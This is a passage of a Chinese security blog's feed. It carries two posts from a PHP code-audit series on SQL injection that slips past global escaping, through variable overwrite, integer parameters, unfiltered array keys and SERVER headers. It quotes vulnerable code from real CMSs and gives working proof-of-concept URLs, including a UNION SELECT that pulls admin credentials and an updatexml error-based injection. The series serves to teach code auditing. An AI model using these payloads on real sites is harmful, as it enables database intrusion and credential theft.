&lt;p&gt;浏览器里post直接传a=1发现成功覆盖了变量a的值&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql6_02.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;目前看乌云的案例&lt;a href=&quot;http://www.wooyun.org/bugs/wooyun-2014-053189&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://www.wooyun.org/bugs/wooyun-2014-053189&lt;/a&gt;是出现在覆盖表前缀上。&lt;br&gt;&lt;strong&gt;$$变量覆盖&lt;/strong&gt;&lt;br&gt;原理其实跟上面一样，有个很经典的$$变量覆盖的代码：&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;preprocessor&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$a&lt;/span&gt;=&lt;span class=&quot;number&quot;&gt;22333&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;foreach&lt;/span&gt;(&lt;span class=&quot;keyword&quot;&gt;array&lt;/span&gt;(&lt;span class=&quot;string&quot;&gt;&#39;_COOKIE&#39;&lt;/span&gt;,&lt;span class=&quot;string&quot;&gt;&#39;_POST&#39;&lt;/span&gt;,&lt;span class=&quot;string&quot;&gt;&#39;_GET&#39;&lt;/span&gt;) &lt;span class=&quot;keyword&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;variable&quot;&gt;$_request&lt;/span&gt;)&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;keyword&quot;&gt;foreach&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$$_request&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;variable&quot;&gt;$_key&lt;/span&gt;=&amp;gt;&lt;span class=&quot;variable&quot;&gt;$_value&lt;/span&gt;)&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;variable&quot;&gt;$$_key&lt;/span&gt; = addslashes(&lt;span class=&quot;variable&quot;&gt;$_value&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;variable&quot;&gt;$a&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;测试发现成功覆盖了变量a&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql6_03.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;案例：&lt;a href=&quot;http://www.wooyun.org/bugs/wooyun-2010-055338&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://www.wooyun.org/bugs/wooyun-2010-055338&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;本文由HackBraid整理总结，原文链接：&lt;a href=&quot;http://www.cnbraid.com/2016/05/31/sql7/&quot;&gt;http://www.cnbraid.com/2016/05/31/sql7/&lt;/a&gt;，如需转载请联系作者。&lt;/p&gt;
</content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;0x01_背景&quot;&gt;0x01 背景&lt;/h2&gt;&lt;p&gt;现在的WEB应用对SQL注入的防护基本都是判断GPC是否开启，然后使用addlashes函数对单引号等特殊字符进行转义。但仅仅使用这样的防护是存在很多盲点的，接上篇&lt;a href=&quot;http://www.cnbraid.com/2016/05/10/sql6/&quot;&gt;http://www.cnbraid.com/2016/05/10/sql6/&lt;/a&gt;，这里介绍另外两种情况。&lt;br&gt;&lt;strong&gt;盲点如下：&lt;/strong&gt;&lt;br&gt;①FILES注入，全局只转义掉GET、POST等传来的参数，遗漏了FILES；&lt;br&gt;②变量覆盖，危险函数：extract()、parse_str()、$$。&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlmangdian2.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;
    
    </summary>
    
      <category term="WEB应用漏洞" scheme="http://www.cnbraid.com/categories/WEB%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/"/>
    
    
      <category term="PHP" scheme="http://www.cnbraid.com/tags/PHP/"/>
    
      <category term="SQL注入" scheme="http://www.cnbraid.com/tags/SQL%E6%B3%A8%E5%85%A5/"/>
    
      <category term="代码审计" scheme="http://www.cnbraid.com/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
    
  </entry>
  
  <entry>
    <title>【PHP代码审计】 那些年我们一起挖掘SQL注入 - 7.全局防护盲点的总结上篇</title>
    <link href="http://www.cnbraid.com/2016/05/10/sql6/"/>
    <id>http://www.cnbraid.com/2016/05/10/sql6/</id>
    <published>2016-05-10T02:35:00.000Z</published>
    <updated>2016-06-24T08:55:05.114Z</updated>
    
    <content type="html">&lt;h2 id=&quot;0x01_背景&quot;&gt;0x01 背景&lt;/h2&gt;&lt;p&gt;现在的WEB应用对SQL注入的防护基本都是判断GPC是否开启，然后使用addlashes函数对单引号等特殊字符进行转义。但仅仅使用这样的防护是存在很多盲点的，比如最经典的整型参数传递，也即被带入数据库查询的参数是整型、数组中的key没过滤被带入了查询以及全局过滤了GET、POST但没过滤SERVER或COOKIE引发的注入。所以看似有全局防护，实则隐藏了很多“后门”～&lt;br&gt;&lt;strong&gt;盲点如下：&lt;/strong&gt;&lt;br&gt;①注入点类似id=1这种整型的参数就会完全无视GPC的过滤；&lt;br&gt;②注入点包含键值对的，那么这里只检测了value，对key的过滤就没有防护；&lt;br&gt;③有时候全局的过滤只过滤掉GET、POST和COOKIE，但是没过滤SERVER。&lt;br&gt;附常见的SERVER变量（具体含义自行百度）：QUERY_STRING,X_FORWARDED_FOR,CLIENT_IP,HTTP_HOST,ACCEPT_LANGUAGE&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlmangdian1.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;&lt;a id=&quot;more&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x02_环境搭建&quot;&gt;0x02 环境搭建&lt;/h2&gt;&lt;p&gt;环境请自行搜寻和搭建吧，从这篇开始只做分析不提供漏洞测试环境~~&lt;/p&gt;
&lt;h2 id=&quot;0x03_漏洞分析&quot;&gt;0x03 漏洞分析&lt;/h2&gt;&lt;h3 id=&quot;完全无视GPC的数字型的注入，其实仔细总结下发现还是很多可以学习的地方。&quot;&gt;完全无视GPC的数字型的注入，其实仔细总结下发现还是很多可以学习的地方。&lt;/h3&gt;&lt;blockquote&gt;
&lt;p&gt;1.传入的参数未做intval转换、构造的sql语句没有单引号保护&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;这个还是比较常见的，当初笔者挖到过一些，乌云案例&lt;a href=&quot;http://www.wooyun.org/bugs/wooyun-2010-065605&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://www.wooyun.org/bugs/wooyun-2010-065605&lt;/a&gt;&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;preprocessor&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;require_once&lt;/span&gt; &lt;span class=&quot;string&quot;&gt;&quot;admin/common.php&quot;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;require_once&lt;/span&gt;(MOBAN_PATH_QZ.&lt;span class=&quot;string&quot;&gt;&quot;header.html&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;comment&quot;&gt;//这里typeid没有做整形转换&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$typeid&lt;/span&gt;=&lt;span class=&quot;keyword&quot;&gt;isset&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$_GET&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;typeid&#39;&lt;/span&gt;]) ? &lt;span class=&quot;variable&quot;&gt;$_GET&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;typeid&#39;&lt;/span&gt;] : &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;comment&quot;&gt;//sql语句没有单引号保护&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$type&lt;/span&gt;=&lt;span class=&quot;variable&quot;&gt;$db&lt;/span&gt;-&amp;gt;fetch_array(mysql_query(&lt;span class=&quot;variable&quot;&gt;$sql&lt;/span&gt;=&lt;span class=&quot;string&quot;&gt;&quot;select * from &quot;&lt;/span&gt;.&lt;span class=&quot;variable&quot;&gt;$db&lt;/span&gt;-&amp;gt;tablepre.&lt;span class=&quot;string&quot;&gt;&quot;newstype where newstypeid=&quot;&lt;/span&gt;.&lt;span class=&quot;variable&quot;&gt;$typeid&lt;/span&gt;));&lt;span class=&quot;comment&quot;&gt;//typeid参数存在注入，数字型；&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;preprocessor&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;获取管理员账户密码的POC：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://localhost/jdy1.5/typeid.php?typeid=1 and 1=2 UNION &lt;span class=&quot;operator&quot;&gt;SELECT &lt;span class=&quot;literal&quot;&gt;NULL&lt;/span&gt;,(select &lt;span class=&quot;keyword&quot;&gt;concat&lt;/span&gt;(username,&lt;span class=&quot;number&quot;&gt;0x23&lt;/span&gt;,&lt;span class=&quot;keyword&quot;&gt;password&lt;/span&gt;) &lt;span class=&quot;keyword&quot;&gt;from&lt;/span&gt; jdy_admin &lt;span class=&quot;keyword&quot;&gt;limit&lt;/span&gt; &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;),&lt;span class=&quot;literal&quot;&gt;NULL&lt;/span&gt;,&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql5_01.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;2.同一参数在第一个sql里做了单引号保护，紧跟第二个忘记加单引号 &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;有幸在Discuz!上看到此类问题，膜拜下雨牛的漏洞&lt;a href=&quot;http://www.wooyun.org/bugs/wooyun-2014-079045&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://www.wooyun.org/bugs/wooyun-2014-079045&lt;/a&gt;&lt;br&gt;简单分析下漏洞原理&lt;br&gt;首先$itemid经过的第一条SQL语句如下&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&lt;span class=&quot;variable&quot;&gt;$query&lt;/span&gt; = $_SGLOBAL[&lt;span class=&quot;string&quot;&gt;&#39;db&#39;&lt;/span&gt;]-&amp;gt;&lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;title&quot;&gt;query&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;(&lt;span class=&quot;string&quot;&gt;&#39;SELECT * FROM &#39;&lt;/span&gt;.tname(&lt;span class=&quot;string&quot;&gt;&#39;spacetags&#39;&lt;/span&gt;)&lt;/span&gt;&lt;/span&gt;.&lt;span class=&quot;string&quot;&gt;&#39; WHERE itemid=\&#39;&#39;&lt;/span&gt;.&lt;span class=&quot;variable&quot;&gt;$itemid&lt;/span&gt;.&lt;span class=&quot;string&quot;&gt;&#39;\&#39; AND status=\&#39;&#39;&lt;/span&gt;.&lt;span class=&quot;variable&quot;&gt;$status&lt;/span&gt;.&lt;span class=&quot;string&quot;&gt;&#39;\&#39;&#39;&lt;/span&gt;)
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;$itemid是有单引号保护的并且做了select查询，如果查询有结果才会带入到delete中，如果无结果就不执行delete。在数据库里itemid是int类型存储的，所以这里本意是只能提交数字型才能查询出结果，如果不是提交的数字的话那么就查询不出来结果，就不去执行下面的delete语句了。但是由于mysql的类型转换，因为这里储存的是int类型，所以1xxxxx跟1的查询结果是一样的，如下：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql5_02.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;然后后面第二条delete的sql语句如下&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$_SGLOBAL[&lt;span class=&quot;string&quot;&gt;&#39;db&#39;&lt;/span&gt;]-&amp;gt;query(&lt;span class=&quot;string&quot;&gt;&#39;DELETE FROM &#39;&lt;/span&gt;.tname(&lt;span class=&quot;string&quot;&gt;&#39;spacetags&#39;&lt;/span&gt;).&lt;span class=&quot;string&quot;&gt;&#39; WHERE itemid=&#39;&lt;/span&gt;.&lt;span class=&quot;variable&quot;&gt;$itemid&lt;/span&gt;.&lt;span class=&quot;string&quot;&gt;&#39; AND tagid IN (&#39;&lt;/span&gt;.simplode(&lt;span class=&quot;variable&quot;&gt;$deletetagidarr&lt;/span&gt;).&lt;span class=&quot;string&quot;&gt;&#39;) AND status=\&#39;&#39;.$status.&#39;&lt;/span&gt;\&lt;span class=&quot;string&quot;&gt;&#39;&#39;&lt;/span&gt;);
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;这里忘记加单引号了，根据上图我们可以构造获取数据库用户的POC：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&lt;span class=&quot;label&quot;&gt;http&lt;/span&gt;://localhost/sup/dan/supesite/&lt;span class=&quot;preprocessor&quot;&gt;cp&lt;/span&gt;.php?ac&lt;span class=&quot;label&quot;&gt;=news&lt;/span&gt;&amp;amp;op&lt;span class=&quot;label&quot;&gt;=view&lt;/span&gt;&amp;amp;&lt;span class=&quot;keyword&quot;&gt;itemid=4 &lt;/span&gt;&lt;span class=&quot;keyword&quot;&gt;and &lt;/span&gt;&lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;=(updatexml(&lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;,concat(&lt;span class=&quot;number&quot;&gt;0x5e24&lt;/span&gt;,(&lt;span class=&quot;keyword&quot;&gt;select &lt;/span&gt;user()),&lt;span class=&quot;number&quot;&gt;0x5e24&lt;/span&gt;),&lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;))#
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql5_03.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;3.php弱类型语言,判断逻辑错误引发注入&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;还是雨牛的案例&lt;a href=&quot;http://www.wooyun.org/bugs/wooyun-2010-088872&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://www.wooyun.org/bugs/wooyun-2010-088872&lt;/a&gt;&lt;br&gt;这里只讲下漏洞形成的原理&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql5_03.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;如上图，弱类型语言在逻辑判断上0&amp;lt;1和0 union select 1&amp;lt;1是等价的，都返回True。&lt;/p&gt;
&lt;h3 id=&quot;数组类型，全局防护只过滤了value，key未过滤带入了查询&quot;&gt;数组类型，全局防护只过滤了value，key未过滤带入了查询&lt;/h3&gt;&lt;p&gt;程序员往往在对数组的处理上不够严谨，导致会出现此类漏洞，笔者当年有幸挖到过ShopEx旗下的ecmall存在这类漏洞，链接：&lt;a href=&quot;http://www.wooyun.org/bugs/wooyun-2010-065284&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://www.wooyun.org/bugs/wooyun-2010-065284&lt;/a&gt;。&lt;br&gt;由于上面那个案例跟序列化相关且过程较为复杂，这里引用乌云另外一则案例：&lt;a href=&quot;http://www.wooyun.org/bugs/wooyun-2010-069746&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://www.wooyun.org/bugs/wooyun-2010-069746&lt;/a&gt;，简要分析这个案例，我们首先看下对数组进行处理的函数：&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;=Add_S(&lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$_GET&lt;/span&gt;=Add_S(&lt;span class=&quot;variable&quot;&gt;$_GET&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$_COOKIE&lt;/span&gt;=Add_S(&lt;span class=&quot;variable&quot;&gt;$_COOKIE&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;... ...&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;Add_S&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;(&lt;span class=&quot;variable&quot;&gt;$array&lt;/span&gt;)&lt;/span&gt;&lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;keyword&quot;&gt;foreach&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$array&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;variable&quot;&gt;$key&lt;/span&gt;=&amp;gt;&lt;span class=&quot;variable&quot;&gt;$value&lt;/span&gt;)&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt;(!is_array(&lt;span class=&quot;variable&quot;&gt;$value&lt;/span&gt;))&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;variable&quot;&gt;$value&lt;/span&gt;=str_replace(&lt;span class=&quot;string&quot;&gt;&quot;&amp;amp;#x&quot;&lt;/span&gt;,&lt;span class=&quot;string&quot;&gt;&quot;&amp;amp; # x&quot;&lt;/span&gt;,&lt;span class=&quot;variable&quot;&gt;$value&lt;/span&gt;);	&lt;span class=&quot;comment&quot;&gt;//过滤一些不安全字符&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;variable&quot;&gt;$value&lt;/span&gt;=preg_replace(&lt;span class=&quot;string&quot;&gt;&quot;/eval/i&quot;&lt;/span&gt;,&lt;span class=&quot;string&quot;&gt;&quot;eva l&quot;&lt;/span&gt;,&lt;span class=&quot;variable&quot;&gt;$value&lt;/span&gt;);	&lt;span class=&quot;comment&quot;&gt;//过滤不安全函数&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			!get_magic_quotes_gpc() &amp;amp;&amp;amp; &lt;span class=&quot;variable&quot;&gt;$value&lt;/span&gt;=addslashes(&lt;span class=&quot;variable&quot;&gt;$value&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;variable&quot;&gt;$array&lt;/span&gt;[&lt;span class=&quot;variable&quot;&gt;$key&lt;/span&gt;]=&lt;span class=&quot;variable&quot;&gt;$value&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&amp;#125;&lt;span class=&quot;keyword&quot;&gt;else&lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;variable&quot;&gt;$array&lt;/span&gt;[&lt;span class=&quot;variable&quot;&gt;$key&lt;/span&gt;]=Add_S(&lt;span class=&quot;variable&quot;&gt;$array&lt;/span&gt;[&lt;span class=&quot;variable&quot;&gt;$key&lt;/span&gt;]); &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;variable&quot;&gt;$array&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;可以看到对数组的value进行了严格的过滤和addlashes转义，但对key没有任何过滤操作，然后我们全局搜索关键词“$key=&amp;gt;$value”，发现如下代码$key被带入了查询&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;elseif&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$job&lt;/span&gt;==&lt;span class=&quot;string&quot;&gt;&#39;manage&#39;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt;(!&lt;span class=&quot;variable&quot;&gt;$atc_power&lt;/span&gt;)showerr(&lt;span class=&quot;string&quot;&gt;&quot;你没权限&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$rsdb&lt;/span&gt;[pages]&amp;lt;&lt;span class=&quot;number&quot;&gt;2&lt;/span&gt;)&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		header(&lt;span class=&quot;string&quot;&gt;&quot;location:post.php?job=edit&amp;amp;aid=$aid&amp;amp;mid=$mid&amp;amp;only=$only&quot;&lt;/span&gt;);&lt;span class=&quot;keyword&quot;&gt;exit&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;variable&quot;&gt;$erp&lt;/span&gt;=get_id_table(&lt;span class=&quot;variable&quot;&gt;$aid&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$step&lt;/span&gt;==&lt;span class=&quot;number&quot;&gt;2&lt;/span&gt;)&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		asort(&lt;span class=&quot;variable&quot;&gt;$orderDB&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;variable&quot;&gt;$i&lt;/span&gt;=&lt;span class=&quot;number&quot;&gt;0&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;keyword&quot;&gt;foreach&lt;/span&gt;( &lt;span class=&quot;variable&quot;&gt;$orderDB&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;AS&lt;/span&gt; &lt;span class=&quot;variable&quot;&gt;$key&lt;/span&gt;=&amp;gt;&lt;span class=&quot;variable&quot;&gt;$value&lt;/span&gt;)&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;variable&quot;&gt;$i&lt;/span&gt;++;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;variable&quot;&gt;$db&lt;/span&gt;-&amp;gt;query(&lt;span class=&quot;string&quot;&gt;&quot;UPDATE &amp;#123;$pre&amp;#125;reply$erp SET orderid=$i WHERE aid=&#39;$aid&#39; AND rid=&#39;$key&#39;&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;构造获取管理员账户密码的POC如下图：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql05_3.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;其它案例：&lt;a href=&quot;http://www.wooyun.org/bugs/wooyun-2014-071516&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://www.wooyun.org/bugs/wooyun-2014-071516&lt;/a&gt;&lt;/p&gt;
&lt;h3 id=&quot;SERVER变量未过滤&quot;&gt;SERVER变量未过滤&lt;/h3&gt;&lt;p&gt;常常发生在获取用户ip并入库的函数上，类似如下代码：&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;comment&quot;&gt;//获取访问者IP（PHP代码/函数）	&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;get_ip&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;()&lt;/span&gt;&lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt;(getenv(&lt;span class=&quot;string&quot;&gt;&quot;HTTP_CLIENT_IP&quot;&lt;/span&gt;) &amp;amp;&amp;amp; strcasecmp(getenv(&lt;span class=&quot;string&quot;&gt;&quot;HTTP_CLIENT_IP&quot;&lt;/span&gt;),&lt;span class=&quot;string&quot;&gt;&quot;unknown&quot;&lt;/span&gt;))&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	  &lt;span class=&quot;variable&quot;&gt;$ip&lt;/span&gt;=getenv(&lt;span class=&quot;string&quot;&gt;&quot;HTTP_CLIENT_IP&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&amp;#125;&lt;span class=&quot;keyword&quot;&gt;else&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (getenv(&lt;span class=&quot;string&quot;&gt;&quot;HTTP_X_FORWARDED_FOR&quot;&lt;/span&gt;) &amp;amp;&amp;amp; strcasecmp(getenv(&lt;span class=&quot;string&quot;&gt;&quot;HTTP_X_FORWARDED_FOR&quot;&lt;/span&gt;),&lt;span class=&quot;string&quot;&gt;&quot;unknown&quot;&lt;/span&gt;))&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	  &lt;span class=&quot;variable&quot;&gt;$ip&lt;/span&gt;=getenv(&lt;span class=&quot;string&quot;&gt;&quot;HTTP_X_FORWARDED_FOR&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&amp;#125;&lt;span class=&quot;keyword&quot;&gt;else&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (getenv(&lt;span class=&quot;string&quot;&gt;&quot;REMOTE_ADDR&quot;&lt;/span&gt;) &amp;amp;&amp;amp; strcasecmp(getenv(&lt;span class=&quot;string&quot;&gt;&quot;REMOTE_ADDR&quot;&lt;/span&gt;),&lt;span class=&quot;string&quot;&gt;&quot;unknown&quot;&lt;/span&gt;))&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	  &lt;span class=&quot;variable&quot;&gt;$ip&lt;/span&gt;=getenv(&lt;span class=&quot;string&quot;&gt;&quot;REMOTE_ADDR&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&amp;#125;&lt;span 